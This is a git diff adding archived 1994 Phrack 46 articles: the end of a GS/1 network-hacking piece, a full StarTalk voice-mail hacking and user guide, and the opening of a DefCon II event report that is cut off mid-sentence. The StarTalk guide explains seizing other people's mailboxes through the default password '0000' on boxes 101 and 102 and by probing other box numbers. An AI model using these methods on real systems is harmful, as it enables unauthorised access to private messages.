++---------------------+
+
+Find out what else you can play with by first finding what networks are
+available other than your own, and second, find out what machines are on
+your network:
+
+>(!2) GS/1# sh att
+>                               Attached Networks
+>&000023B5
+>(!2) GS/1# sh nmap l
+>                             NETWORK &000023B5 MAP
+>
+>  1-%070002017781 SW/AT-NCS       3.0.2  2-%070002A049C5 SW/NB-BR-3.1.1.1
+>  3-%0700020269A7 SW/200-A/BSC/SDL22000  4-%07000201C089 SW/200-A/BSC/SDL22020
+>  5-%070002023644 SW/200-A/BSC/SDL22020  6-%0700020138B2 SW/AT-NCS       2.1.1
+>  7-%070002010855 SW/100-A/BSC    20060  8-%070002018BA2 SW/20-XNS-X.25  .0.2
+> .... etc.
+
+The boot server address, from previous examples, is number 1
+which contains a description "SW/AT-NCS".  Examining the rest of the
+list, number 6 has the same description.  System 12 may be just another
+address for the boot server or it may be a different Xenix... but it should
+be Xenix whatever it is.
+
+We have refrained from covering the typical GS/1 information that has been
+published by others; and instead, covered newer concepts in GS/1 hacking.
+This phile is not a complete guide to GS/1 hacking; but expect successive
+publications on the topic.
+
+
+
+
+
+ 
diff --git a/phrack46/18.txt b/phrack46/18.txt
new file mode 100644
index 0000000..ea100b8
--- /dev/null
+++ b/phrack46/18.txt
@@ -0,0 +1,460 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 18 of 26
+
+****************************************************************************
+
+      ***** ********  ****     *****  ********  ****    **     **   **
+     *****    ****   **  **   **   **   ****   **  **   **     ** ***
+       ****   ****  ** ** **  ** **     ****  ** ** **  **     *****
+     *****    **** **      ** **  ***   **** **      ** ****** **  ***
+
+             (*)  A Complete 'N Easy Guide to Hacking and the (*)
+                (*) Usage of "StarTalk" Voice Mail Systems (*)
+
+                           Written By: The Red Skull
+                                   07/25/94
+
+                                 Introduction
+                                 ~~~~~~~~~~~~
+      There are many types of different voice mail systems out there, that
+run on phone systems they are compatible with.  You have probably seen a lot
+of text files about hacking voice mail systems, on your local bulletin
+boards.  The popular ones you might have heard about are systems like, Aspen
+(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
+Meridian Mail.  There are VMB hacking programs that are suppose to hack vmbs
+for you.  I really don't believe in those kind of programs.  When I say this,
+I am not talking about programs like Tone Locator or Blue Beep, I am talking
+about programs like 'The Aspen Hacker' and any other *VMB* hacking programs.
+I am just saying this, so you don't mix this guide up with a vmb hacking
+program.
+
+                             General Information
+                             ~~~~~~~~~~~~~~~~~~~
+     I have decided to write a hacking/user's guide for the StarTalk Voice
+Mail System because there is no guide for the StarTalk Voice Mail System,
+and almost no one has heard about it.  Since this will be the first one for
+it, I will try and explain it as simply as possible.  You might have heard
+of Northern Telecom.  They are the makers of StarTalk, but they are also the
+makers of a very popular user-friendly Voice Mail System called 'Meridian
+Mail'.  Both StarTalk and Meridian Mail run on the Norstar telephone system.
+StarTalk is designed to function as an extension of the Norstar telephone
+system.  All the StarTalk software operation is done on a Norstar telephone
+set, so that means it doesn't run on a computer terminal.  There are 3
+different sizes and configurations that the StarTalk Voice Mail System
+comes with -
+
+ o Model 110 - 2 voice channels, with 1 hour and 50
+               minutes total storage.
+
+ o Model 165 - 4 voice channels, with 2 hours and 45
+               minutes total storage.
+
+ o Model 385 - 4 voice channels, with 6 hours and 25
+               minutes total storage.
+               The capabilities of StarTalk Model 385
+               can be further expanded through an
+               enhancement option, available in 4, 6
+               or 8 channel versions, which provides
+               a total of 9 hours an 45 minutes of
+               storage.
+
+     Right now, you might be wondering what the hell i'm talking about, but
+it's simple.  The number of voice channels means how many voice mail users
+could be using their voice mail.  So for example, 4 voice channels, means only
+4 voice mail users could be on the voice mail system.  The Model 110 can hold
+about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
+boxes and higher.  So, it's better if you find a StarTalk Voice Mail System
+that is running Model 385.  The part that says 'with 6 hours and 25 minutes
+total storage', means how many hours of messages it can store.  The Model 385
+is also upgradable.  I could go on about the models but that's all we need to
+know for now.  So now that we've finished this, we will get into the part
+that you've been waiting for.
+
+                     Finding a StarTalk Voice Mail System
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     You will probably not be able to recognize a StarTalk voice mail system
+if you find one using a war dialer, because when a StarTalk system answers,
+it will only have the company's personalized automated greeting.  There are
+only two ways to get a StarTalk system:  you either scan it out yourself or
+get it from someone else.  If you get it from someone else, all the boxes
+will probably be gone, used or just not safe.
+
+                   Recognizing a StarTalk Voice Mail System
+                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Ok, now let's say you have come across a StarTalk system, how do you
+know that it's a StarTalk?  As I said, you will not be able to tell if it's a
+StarTalk system by just calling it.  If the system is a Startalk, when the
+company's personalized greeting answers, press '*' and it should say -
+
+"Please enter the mailbox number, or press the # sign to use the directory"
+
+Remember, if you press '*' and just sit there, it will repeat the message
+one more `time, and then say "Exiting the system."
+
+If you hit '**' it should say -
+
+"Please enter your mailbox number and your password, then press # sign"
+
+If you don't get anything like this, that means it's not a StarTalk Voice
+Mail System.  If you are still not sure that you have a StarTalk System,
+then you can always call 416-777-2020 and listen to the voice and see
+if it matches with what you have found.
+
+                           Finding a Virgin Box
+                           ~~~~~~~~~~~~~~~~~~~~
+     This is a very interesting step and also an easy one.  Once you have
+found a StarTalk Voice Mail System, the first thing you'll want to do is
+get some boxes on it.  The interesting part is that you are always guaranteed
+to get one box on a StarTalk System.  This is because every StarTalk System
+has a box that is for the voice mail users to leave any problems they are
+experiencing with their vmb.  This is the box that almost always has a default
+on it, but if the System Admin is smart he will change it.  So far, on all the
+StarTalk systems that I have come across the default for this box hasn't been
+changed.  The box number is '101' and the defaults for StarTalk Voice Mail
+systems are '0000'.  So the first thing you should do is call up the system
+and press *101 and the default greeting on the box should say (this greeting
+is for box 101 only) -
+
+"This is the Trouble-Report mailbox, if you are experiencing difficulty
+ using the messaging features, please leave your name, mailbox # and a
+ detailed description of the problem" *BEEP*
+
+If it says that, press '**' and then when it asks you to enter your mailbox
+number and your password, enter '1010000' and press the # sign.  If you've
+followed everything I've said and the System Admin hasn't changed the
+default on this box, it should go ahead and ask you to enter your new
+personal mailbox password.  There is another box number which is sometimes
+at the default which is the System Admin's box at 102.  Although this is a
+System Admin box, the only System Admin option it has available is to leave
+a broadcast message, which leaves a message to all boxes on the system.
+This box will have the regular default greeting which is -
+
+"This mailbox is not initialized and cannot accept messages, please
+ try again later"
+
+Do the same thing you did before, If it says that, press '**' and then when
+it asks you to enter your mailbox number and your password, enter '1020000'
+and press the # sign.  If everything is fine, it should ask you to enter your
+new personal mailbox password.  This is called Initializing your mailbox, and
+I'll talk about this later in this file.  So, there you go, you've got your
+box on a StarTalk System.  All StarTalk Voice Mail Systems that I have run
+into so far have had 2-3 digit mailboxes.  Now, to hack any other boxes
+through the system, you would have to go and keep on trying 3 digit mailbox
+number starting with 1XX, until you find an empty box with a regular default
+greeting.  Let's say you find another empty box at box number 130, you will do
+the same thing, press '**' and when it asks you to enter your mailbox number
+and your password, enter '1300000' and press the # sign.  One thing I like
+about box number '101' is that, a lot of System Admin's are not aware that it
+even exists, that is because they probably have a lousy TSR (Technical Service
+Rep).  (This is the person that is suppose to help them install the Voice
+Mail System.)
+
+            What to do After you've Got A StarTalk Voice Mail Box
+            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The rest of the file will concentrate on all the inside functions and
+options that a StarTalk Voice Mail Box has.  We will be covering all
+these topics -
+
+ o Initializing a Mailbox
+ o Your Mailbox Greeting
+ o Recording a Greeting
+ o Choosing a Mailbox Greeting
+ o Listening To Messages
+ o Off-premise Message Notification
+ o Setting Up Off-premise Message Notification
+ o Disabling Off-premise Message Notification
+ o Changing Off-premise Message Notification
+ o Leaving a Mailbox Message
+ o Message Delivery Options
+ o Assigning the Target Attendant
+ o Quick Reference Tips
+
+                                 Your Mailbox
+                                 ~~~~~~~~~~~~
+     Before you can use your mailbox, you must:
+
+     - open your mailbox
+     - change your password
+     - record your name
+     - record your personal mailbox greeting(s)
+
+This is called Initializing your mailbox.
+
+Initializing a Mailbox
+----------------------
+To open and initialize your mailbox:
+
+1. Press * * and Mailbox #
+2. Enter the default password '0000'
+3. To end the password, press #
+4. The StarTalk voice prompt, asks you to enter your new personal mailbox
+   password.
+5. Using touchtones, enter your new mailbox password.  Your password can
+   be from 4 to 8 digits long, but it cannot start with zero.
+6. To end your password, press #
+7. After you have accepted your password, you are asked to record your name
+   in the Company Directory, At the tone, record your name.
+8. To end your recording, press #
+9. To accept your recording, press #
+
+You are now ready to record your personal mailbox greetings.  Once your
+greetings are recorded, you have the option of selecting either your primary
+or alternate greeting.  If you do not select a greeting, your primary
+greeting plays automatically.
+
+Note: Initializing a mailbox is only done the first time you open your
+mailbox.  You have to initialize your mailbox to receive messages.
+
+                            Your Mailbox Greeting
+                            ~~~~~~~~~~~~~~~~~~~~~
+      Each mailbox has a primary and alternate greeting recorded by you.
+After you have recorded your personal mailbox greetings, you can choose
+which greeting you play to callers reaching your mailbox.
+
+Recording a Greeting
+--------------------
+To record your greetings, you must first open your mailbox.  Once you have
+opened your mailbox:
+
+1. Press 8
+2. To select Greeting Options, press 2
+3. To record your greeting, press 1
+4. Select which greeting you are going to record.
+   Note: You can choose to record either your primary or alternate mailbox
+   greeting.
+5. To record your greeting, press 1
+6. At the tone, record your greeting.
+7. To end your greeting, press #
+8. To accept this recording, press #
+
+Choosing a Mailbox Greeting
+---------------------------
+After the mailbox greeting is recorded, you can choose which greeting you
+are going to use.  If you do not choose a mailbox greeting, Startalk
+automatically plays your primary greeting.  To choose a mailbox greeting
+you must open your mailbox. Once you have opened your mailbox:
+
+1. Press 8
+2. To select Greeting Options, press 2
+3. Press 2
+4. Select which mailbox greeting your mailbox is going to use.
+
+Listening To Messages
+---------------------
+Each time you open your mailbox, StarTalk plays any Broadcast messages left
+by the System Admin (don't reply to them!), and also tells you how many other
+messages are in your mailbox.  Messages are played beginning with any Urgent
+messages, followed by the first message left in your mailbox.
+
+To listen to messages, you must open your mailbox.  Once you have opened
+your mailbox:
+
+1.  To listen to messages, press 2 or to listen to your saved messages,
+    press 6
+
+Your first message starts to play.  While listening to a message, or after
+a message has played, you can:
+
+Replay the message          : 1 1
+Back up 9 seconds           : 1
+Pause and Continue          : 2 to pause then 2 to continue
+Forward 9 seconds           : 3
+Skip to the end of message  : 3 3
+Play the previous message   : 4
+Forward the message         : 5
+Skip to the next message    : 6
+Play time and date stamp    : 7
+Save a Message              : 7 7
+Erase the message           : 8
+Reply to the message        : 9
+Volume control              : *
+
+Note: After listening to the messages left in your mailbox and exiting
+      StarTalk, all messages you do not erase are automatically saved.
+
+
+Off-premise Message Notification
+--------------------------------
+Off-premise Message Notification, to a telephone number or a pager, alerts
+you when messages are left in your mailbox.  Off-premise Message Notification
+is enabled in the StarTalk Class of Service designation by the System
+Coordinator.
+
+Setting Up Off-premise Message Notification
+-------------------------------------------
+To set up Off-premise Message Notification, you must first open your
+mailbox.  Once you have opened your mailbox:
+
+1.  Open the mailbox admin menu, press 8
+2.  Open the message notification menu, press 6
+3.  To set up message notification, press 1
+4.  To select a line, press 1
+    Note:  You can also select line, pool or intercom.
+    (YOU HAVE TO SELECT LINE)
+5.  Enter a line, pool or IC number, press #
+    Note:  You have to enter '1', or '01' as the line if 1 doesn't work.
+6.  To accept the line, pool or IC number, press #
+7.  Enter the destination telephone number, press #
+    Note:  While you are entering a telephone number, you can press a dialpad
+    number to represent dialtone recognition or other telephone number options.
+    When StarTalk is installed with PBX or Centrex and you want to access an
+    outside line, you must enter the command to recognize dial tone.  For
+    example enter 9 to access an outside line, press # then enter 4 to
+    recognize dialtone press 2 followed by the destination number, press #
+    and any required pauses.   Each pause entered is four seconds long.
+8.  To end the telephone number, press #
+9.  To accept the telephone number, press #
+10. To accept the destination type telephone, press # and move to step 12.
+    To change the destination type to pager, press 1
+    Note: The destination type can be either telephone or pager.  StarTalk
+    automatically selects telephone.  When the pager destination
+    type is selected, a pause must be inserted.  The number of pauses
+    required depends on the pager system being used.
+11. To accept the destination type, press #
+    If the message destination type is a telephone, you must set a start time.
+12. Enter the time when Off-premise Message Notification is to start.
+    Note: This is a four-digit field.  Any single digit hour and minute
+    must be preceded by a zero.
+13. Press 1 for AM, 2 for PM.
+14. To accept the start time, press #
+15. Enter the time when Off-premise Message Notification is to stop.
+    Note : This is a four-digit field.  Any single digit hour and
+    minute must be preceded by a zero.
+16. Press 1 for AM, 2 for PM.
+17. To accept the stop time, press #
+18. To accept the message type NEW, press #
+    To change the message type to URGENT, press 1
+    Note: The default message type is NEW. This means you are notified
+    whenever you receive a new message.  Changing the message type changes
+    NEW to URGENT.  This means you are only notified when you receive an
+    urgent message.
+19. To accept the message type, press #
+
+The Off-premise Message Notification will begin as soon as the start time
+is reached.  You will be called whenever you receive a message.
+
+
+Disabling Off-premise Message Notification
+------------------------------------------
+To disable Off-premise Message Notification, you must first open your
+mailbox, Once your mailbox is open:
+
+1. Open the mailbox admin menu, press 8
+2. To access the message notification menu, press 6
+3. To listen to the options, press 2
+4. To disable message notification, press 1
+
+Off-premise Message Notification is disabled.
+
+Changing Off-premise Message Notification
+-----------------------------------------
+To change Off-premise Message Notification, you must first open your mailbox,
+Once you have opened your mailbox:
+
+1.  Open the mailbox admin menu, press 8
+2.  Open the message notification menu, press 6
+3.  To change message notification press 1
+4.  To select a line, press 1
+5.  Press 1
+    If you wish to change the line, press #
+6.  Enter the new line number.
+7.  To end the line number, press #
+8.  To accept the line number, press #
+9.  Press 1
+    If you do not wish to change the destination telephone number, press #
+10. Enter the new destination telephone number.
+11. To end the telephone number, press #
+12. To accept the telephone number, press #
+13. To change the destination type, press 1
+14. To accept the destination type, press #
+15. To change the start time, press 1
+    If you do not wish to change the time, press #
+16. Enter the time when Off-premise Message Notification is to start.
+17. Press 1 for AM, 2 for PM.
+18. To accept the start time, press #
+19. To change the stop time, press 1
+    If you do not wish to change the time, press #
+20. Enter the time when Off-premise Message Notification is to stop.
+21. Press 1 for AM, 2 for PM.
+22. To accept the stop time, press #
+23. To change the message type, press 1
+24. To accept the message type, press #
+
+Leaving a Mailbox Message
+-------------------------
+You can leave a message directly in any StarTalk mailbox, as long as that
+mailbox has been initialized.
+
+To leave a mailbox message:
+
+1. Enter the mailbox # and at the tone, record your message.
+2. To end your recording, press #
+3. For delivery options, press 3
+4. To send your message, press #
+
+Message Delivery Options
+------------------------
+StarTalk provides you with four message delivery options, which are:
+
+Certified 1 - This delivery option sends you a message and tells you if
+              the person received and read your message, but this is
+              only if the message is inside the system.
+
+Urgent    2 - This delivery option marks the message, and plays it before
+              playing other messages left in your mailbox.
+
+Private   3 - This delivery option prevents a message from being forwarded
+              to another mailbox.
+
+Normal    # - This delivery option sends a message to a mailbox.  Normal
+              messages are played in the order in which they are received,
+              and can be forwarded to other mailboxes.
+
+After you have recorded your mailbox message, press 3 to access delivery
+options.  To use one of the delivery options, press the right delivery
+option number.
+
+Note: When leaving a message, you can press 9 to listen to StarTalk voice
+      prompts in the alternate language.
+
+Assigning the Target Attendant
+------------------------------
+Anyone that presses [0] when they are connected to your box will be
+transferred  to an operator if your Target Attendant is set to [0] or her
+mailbox #.
+
+To change from the Operator to the Target Attendant -
+
+1. Press 8
+2. Press 5
+3. Press 1
+4. Enter <desired extension>
+5. Press *
+
+Quick Reference Tips
+--------------------
+
+ - To save time, you can just interrupt most prompts by press # or selecting
+   a StarTalk option.
+
+ - If you get lost using StarTalk options, press * to replay the option list
+
+ ```````````````````````````````````````````````````````````````````````````
+ Ok, this is the end of the StarTalk voice mail guide.  I tried my best
+ to make it as simple as I could with respect to both hacking it
+ and using it.  I plan on writing my next file on Smooth Operator, a
+ PC-based information processing system.  I will probably focus more on
+ the terminal part of it.  I will try and cover the logins and all other
+ things needed to get around the system.  If any readers out there have
+ comments or suggestions on this article, or on my next article, please
+ contact me.
+
+ If you would like to talk about this, you can find me on IRC with the nick
+ 'redskull' or you can write me a message on my Internet Address.
+ Internet Address : redskull@io.org
+
+ I'd like to thank S. Cleft for giving me some tips and also discovering
+ some of the things I've mentioned in this file.
+
+ ````````````````````````````````````````````````````````````````````````````
diff --git a/phrack46/19.txt b/phrack46/19.txt
new file mode 100644
index 0000000..0a72034
--- /dev/null
+++ b/phrack46/19.txt
@@ -0,0 +1,940 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 19 of 28
+
+****************************************************************************
+
+                      DefCon II: Las Vegas
+
+                  Cyber-Christ meets Lady Luck
+
+                        July 22-24, 1994
+
+                        by Winn Schwartau
+              		   (C) 1994
+         
+
+Las  Vegas connotes radically different images to radically  dif
+ferent  folks.   The Rat Pack of Sinatra, Dean Martin  and  Sammy 
+Davis  Jr.  elicits up the glistening self-indulgent  imagery  of  
+Vegas'   neon  organized  crime in the  '50's   (Ocean's  Eleven 
+displayed only minor hacking skills.)
+
+Then  there's the daily bus loads of elderly nickel  slot  gam
+blers from Los Angeles and Palm Springs who have nothing  better 
+to  do  for twenty out of twenty four hours each  day.   (Their 
+dead  husbands were golf hacks.)   Midwesterners  now  throng to 
+the Mississippi River for cheap gambling.
+
+Recreational vehicles of semi-trailor length from East  Bullock, 
+Montana  and  Euclid, Oklahoma and Benign, Ohio clog  routes  80 
+and 40 and 10 to descend with a vengeance upon an asphalt  home 
+away  from home in the parking lot of Circus Circus.  By  cul
+tural demand, every Rv'er worth his salt must, at least once in 
+his life,  indulge in the depravity of Glitter Gulch.  
+
+And  so they come, compelled by the invisibly insidious  derelict 
+attraction  of a desert Mecca whose only purpose in life  is  to 
+suck  the  available  cash from  addicted  visitor's  electronic 
+purses of ATM and VISA cards. (Hacker?  Nah . . .)
+
+Vegas  also has the distinction of being home to the largest  of 
+the largest conventions and exhibitions in the world.   Comdex 
+is the world's largest computer convention where 150,000  techno-
+dweebs  and  silk  suited glib  techno-marketers  display  their 
+wares  to a public who is still paying off  the 20% per  annum 
+debt  on last year's greatest new electronic gismo which  is 
+now rendered thoroughly obsolete.  And the Vegas Consumer  Elec
+tronic  Show does for consumer electronics what the First  Amend
+ment does for pornography.  (Hackers, are we getting close?)
+
+In between, hundreds upon hundreds of small conferences and 
+conventions  and sales meetings and annual excuses  for  excess 
+all  select Las Vegas as the ultimate host city.  Whatever  you 
+want, no matter how decadent, blasphemous, illegal or immoral, at 
+any  hour, is yours for the asking, if you have cash or a  clean 
+piece of plastic.  
+
+So, it comes as no surprise, that sooner or later, (and it turns 
+out to be sooner) that the hackers of the world, the computer 
+hackers, phone phreaks, cyber-spooks, Information Warriors, data 
+bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, 
+virus  writers  and  perhaps the occasional  Cyber  Christ  again 
+picked Las Vegas as the 1994 site for DefCon II. 
+
+You see, hackers are like everyone else (sort of) and so they, 
+too, decided that their community was also entitled to hold 
+conferences and conventions.
+
+DefCon  (as opposed to Xmas's HoHoCon), is the  premier  mid-year 
+hacker extravaganza.  Indulgence gone wild, Vegas notwithstanding 
+if  previous Cons are any example; but now put a  few  hundred 
+techno-anarchists  together in sin city USA, stir  in  liberal 
+doses  of  illicit controlled pharmaceutical substances, and  we 
+have a party that Hunter Thompson would be proud to attend.
+
+All  the while, as this anarchistic renegade regiment marches  to 
+the tune of a 24 hour city, they are under complete  surveillance 
+of  the authorities.  Authorities like the FBI, the Secret  Serv
+ice,  telephone security . . . maybe even Interpol.  And how  did 
+the  "man"  arrive in tow behind the techno-slovens  that  belong 
+behind bars?
+
+They were invited.
+
+And so was I.  Invited to speak. (Loose translation for standing 
+up  in front of hundreds of hackers and being verbally  skewered 
+for having an opinion not in 100% accordance with their own.)   
+
+"C'mon,  it'll be fun," I was assured by DefCon's organizer,  the 
+Dark Tangent.
+
+"Sure  fired way to become mutilated monkey meat,"  I  responded.  
+Some  hackers just can't take a joke, especially after  a  prison 
+sentence and no opposite-sex sex.
+
+"No really, they want to talk to you . . ."
+
+"I bet."
+
+It's  not that I dislike hackers - on the contrary.  I have  even 
+let a few into my home to play with my kids.  It's just that,  so 
+many  of the antics that hackers have precipitated at  other Cons 
+have  earned them a reputation of disdain by all, save those  who 
+remember  their own non-technical adolescent shenanigans.  And  I 
+guess I'm no different.  I've heard the tales of depraved  indif
+ference,  hotel  hold-ups, government raids on folks  with  names 
+similar to those who are wanted for pushing the wrong key on  the 
+keyboard and getting caught for it.  I wanted to see teens and X-
+generation types with their eyes so star sapphire glazed over that 
+I could trade them for chips at the craps table.   
+
+Does  the truth live up to the fiction?  God, I hope so. It'd  be 
+downright  awful and unAmerican if 500 crazed hackers didn't  get 
+into at least some serious trouble.  
+
+So I go to Vegas because, because, well, it's gonna be fun.  And, 
+if I'm lucky, I might even see an alien spaceship.  
+
+For you see, the party has already begun.
+
+
+I  go to about 30 conventions and conferences a year, but  rarely 
+if ever am I so Tylonol and Aphrin dosed that I decide to go with 
+a severe head cold.  Sympomatic relief notwithstanding I  debated 
+and  debated, and since my entire family was down with  the  same 
+ailment  I figured Vegas was as good a place to be as at home  in 
+bed.   If  I could survive the four and half  hour  plane  flight 
+without  my  Eustahian tubes rocketing through my ear  drums  and 
+causing  irreparable damage, I had it made.
+
+The  flight was made tolerable becuase I scuba dive.   Every  few 
+minutes I drowned out the drone of the engines by honking  uncon
+trollably  like  Felix  Ungerto without his  aspirator.   To  the 
+chagrin of my outspoken counter surveillance expert and traveling 
+mate,  Mike  Peros and the rest of the first  class  cabin,   the 
+captain reluctantly allowed be to remain on the flight and not be 
+expelled sans parachute somewhere over Southfork, Texas.   Snort, 
+snort.  Due to extensive flirting with the two ladies across  the 
+aisle, we made the two thousand mile trek in something less  than 
+34  minutes . . . or so it seemed.  Time flies took on new  mean
+ing. 
+
+For  those who don't know, the Sahara Hotel is the dregs  of  the 
+Strip.   We were not destined for Caesar's or the MGM or  any  of 
+the  new multi-gazillion dollar hotel cum casinos  which  produce 
+pedestrian  stopping  extravaganzas as an inducement to  suck  in 
+little old ladies to pour endless rolls of Washington quarters in 
+mechanical  bottomless pits. The Sahara was built some 200  years 
+ago  by native slave labor whose idea of plumbing is  clean  sand 
+and  decorators  more concerned with a mention in Mud  Hut  Daily 
+than Architectural Digest.  It was just as depressingly dingy and 
+solicitly low class as it was when I forced to spend eleven  days 
+there (also with a killer case of the flu) for an extended Comdex 
+computer show.  But, hey, for a hacker show, it was top flight.  
+
+"What hackers?" The desk clerk said when I asked about the show.
+
+I explained.  Computer hackers: the best from all over the  coun
+try.  "I hear even Cyber Christ himself might appear."
+
+Her  quizzical  look emphasized her pause.  Better  to  ignore  a 
+question   not understood than to look stupid.  "Oh,  they'll  be 
+fine,  We have excellent security."  The security people, I found 
+out  shortly thereafter knew even less: "What's a  hacker?"   Too 
+much  desert sun takes its toll.  Proof positive photons are  bad 
+for neurons.  
+
+Since it was still only 9PM Mike and I sucked down a couple of $1 
+Heinekens in the casino and fought it out with Lineman's  Switch
+ing  Union representatives who were also having their  convention 
+at the Sahara.  Good taste in hotels goes a long way.  
+
+"$70,000  a  year to turn a light from red to  green?"   we  com
+plained.
+
+"It's a tension filled job . . .and the overtime is murder."
+
+"Why a union?"
+
+"To protect our rights."
+
+"What rights?"
+
+"To make sure we don't get replaced by a computer . . ."
+
+"Yeah,"   I  agreed.   "That  would  be  sad.   No  more   Amtrak 
+disasters."  The crowd got ugly so we made a hasty retreat  under 
+the scrutiny of casino security to our rooms. Saved.
+
+Perhaps  if  I  noticed or had read the  original  propaganda  on 
+DefCon, I might have known that nothing significant was going  to 
+take  place  until the following (Friday) evening  I  might  have 
+missed all the fun.
+
+For  at around 8AM, my congestion filled cavities  and  throbbing 
+head was awakened by the sound of an exploding toilet.  It's kind 
+of  hard  to  explain what this sounds like.   Imagine  a  toilet 
+flushing  through  a  three megawatt sound system  at  a  Rolling 
+Stones concert. Add to that the sound of a hundred thousand   flu 
+victims standing in an echo chamber cleansng their sinuses into a 
+mountain  of  Kleenex while three dozen  football  referees  blow 
+their foul whistles in unison, and you still won't come close  to 
+the  sheer cacophonous volume that my Saharan toilet exuded  from 
+within its bowels.  And all for my benefit.  
+
+The  hotel  manager  thought I was kidding.  "What  do  you  mean 
+exploded?"
+
+"Which word do you not understand?" I growled in my early morning 
+sub-sonic voice.  "If you don't care, I don't."  
+
+My  bed was floating.  Three or maybe 12 inches of water  created 
+the damnedest little tidal wave I'd ever seen, and the sight  and 
+sound  of  Lake Meade in room 1487 only exascerbatd the  pressing 
+need to relieve myself.  I dried my feet on the extra bed linens, 
+worried  about electrocution and fell back asleep. It could  have 
+been  3  minutes or three hours later - I have no way to  know  -  
+but  my hypnogoic state was rudely interrupted by  hotel  mainte
+nance pounding at the door with three fully operational  muffler-
+less jack hammers.
+
+"I  can't  open  it," I bellowed over the continual  roar  of  my 
+personal  Vesuvius Waterfall.  "Just c'mon in."   The  fourteenth 
+floor hallway had to resemble an underwater coral display becuase 
+the door opened ever so slowly..
+
+"Holy Christ!"  
+
+Choking  back  what would have been a painful laugh,  I  somehow 
+eeked out the words, with  a smirk, "Now you know what an explo-
+ding  toilet  is like."
+
+For,  I  swear, the next two hours three men  whose  English  was 
+worse  than a dead Armadillo attempted to suck up the Nile  River 
+from my room and the hallway.  Until that very moment in time,  I 
+didn't  know  that  hotels were outfitted  with  vacuum  cleaners 
+specifically designed to vacuum water.  Perhaps this is a regular 
+event.
+
+
+Everyone  who has ever suffered through one bitches  about  Vegas 
+buffets,  and  even the hackers steered away  from  the  Sahara's  
+$1.95  "all you can eat" room: "The Sahara's buffet is the  worst 
+in  town;  worse than Circus Circus."  But since I  had  left  my 
+taste  buds  at 37,000 feet along with schrapneled pieces  of  my 
+inner ear, I sought out sustenance only to keep me alive  another 
+24 hours.
+
+By mid afternoon, I had convinced myself that outside was not the 
+place  to be. After only eighteen minutes of  120  sidewalk  egg-
+cooking  degrees, the hot desert winds took what was left  of  my 
+breath  away  and with no functioning airways as it was,  I  knew 
+this  was  a big mistake.  So, hacker convention, ready  or  not, 
+here I come.
+
+Now,  you  have to keep in mind that Las Vegas  floor  plans  are 
+designed  with  a singular purpose in mind. No matter  where  you 
+need to go, from Point A to Point B or Point C or D or  anywhere, 
+the traffic control regulations mandated by the local police  and 
+banks require that you walk by a minimum of 4,350 slot  machines, 
+187  gaming  tables of various persuasions and no  less  than  17 
+bars.  Have they no remorse?  Madison Avenue ad execs take heed! 
+
+So, lest I spend the next 40 years of my life in circular pursuit 
+of  a  sign-less hacker convention losing every last  farthing  I 
+inherited from dead Englishmen, I asked for the well hidden loca-
+tion at the hotel lobby.
+
+"What  hackers?"  There goes that nasty photon  triggered  neuron 
+depletion again.
+
+"The computer hackers."
+
+"What computer hackers.  We don't have no stinking hackers . . ."  
+Desk clerk humor, my oxymoron for the week.
+ 
+I tried the name: DefCon II.
+
+"Are  we going to war?"  one ex-military Uzi-wielding guard  said 
+recognizing the etymology of the term. 
+
+"Yesh, it's true"  I used my most convincing tone. "The  Khasaks
+tanis  are coming with nuclear tipped lances riding hundred  foot 
+tall  horses.   Paris has already fallen.  Berlin  is  in  ruins.  
+Aren't you on the list to defend this great land?"
+
+"Sure as shit am!"   He scampered off to the nearest phone in  an 
+effort  to  be the first on the front lines.   Neuron  deficiency 
+beyong surgical repair..
+
+I  slithered down umpteen hallways and casino aisles lost in  the 
+jungle of jingling  change.   Where the  hell  are  the  hackers?   
+"They must be there," another neuron-impoverished Saharan employ
+ee said as he pointed towards a set of escalators at the very far 
+end of the casino.  
+
+All the way at the end of the almost 1/4 mile trek through  Sodom 
+and Gonorrhea an 'up' escalator promised to take me to hackerdom.  
+Saved  at last.  Upstairs.  A conference looking area.  No  signs 
+anywhere,  save  one of those little black  Velcro-like  stick-em 
+signs where you can press on white block letters.
+
+	               No Mo Feds
+
+I must be getting close. Aha, a maintenance person; I'll ask him.  
+"What hackers?  What's DefCon."
+
+Back  downstairs,  through the casino, to the  front  desk,  back 
+through  the casino, up the same escalator again. Room One I  was 
+told.   Room  One  was empty.  Figures.  But, at the  end  of   a 
+hallway,  past the men's room and the phones, and  around  behind 
+Room One I saw what I was looking for: a couple of dozen T-shirt
+ed,  Seattle grunged out kids (read: under 30) sitting at  uncov
+ered  six foot folding tables hawking their DefCon  II  clothing, 
+sucking  on Heinekens and amusing themselves with  widely  strewn 
+backpacks and computers and cell phones.
+
+I had arrived!
+
+			* * * *
+
+You  know,  regular old suit and tie conferences  could  learn  a 
+thing or two from Jeff Moss, the man behind DefCon II.  No  fancy 
+badge making equipment; no $75 per hour union labor built  regis
+tration  desks; no big signs proclaiming the wealth of  knowledge 
+to  be gained by signing up early.  Just a couple of kids with  a 
+sheet of paper and a laptop.  
+
+It turned out I was expected.  They handed me my badge and what a 
+badge it was.  I'm color blind, but this badge put any psychedel
+ically induced spectral display to shame.  In fact it was a close  
+match  to the Sahara's mid 60's tasteless casino carpeting  which 
+is so chosen as to hide the most disgusting regurgative blessing.  
+But better and classier.
+
+The neat thing was, you could (in fact had to) fill out your  own 
+badge  once  your name was crossed off the piece  of  paper  that 
+represented the attendee list.  
+
+Name:
+Subject of Interest:
+E-Mail:
+
+Fill  it  out  any way you want.  Real name,  fake  name,  alias, 
+handle  - it really doesn't matter cause the  hacker  underground 
+ethic  encourages anonymity.  "We'd rather not know who  you  are 
+anyway, unless you're a Fed.  Are you a Fed?"
+
+A  couple of lucky hackers wore the ultimate badge of honor.   An 
+"I  Spotted A Fed" T-shirt.  This elite group sat or lay  on  the 
+ground watching and scouring the registration area for signs that 
+someone,  anyone, was a Fed.  They really didn't care or  not  if 
+you  were a Fed - they wanted the free T-shirt and the  peer  re
+spect that it brought.
+
+I'm over 30 (OK, over 35) and more than a few times (OK, a little 
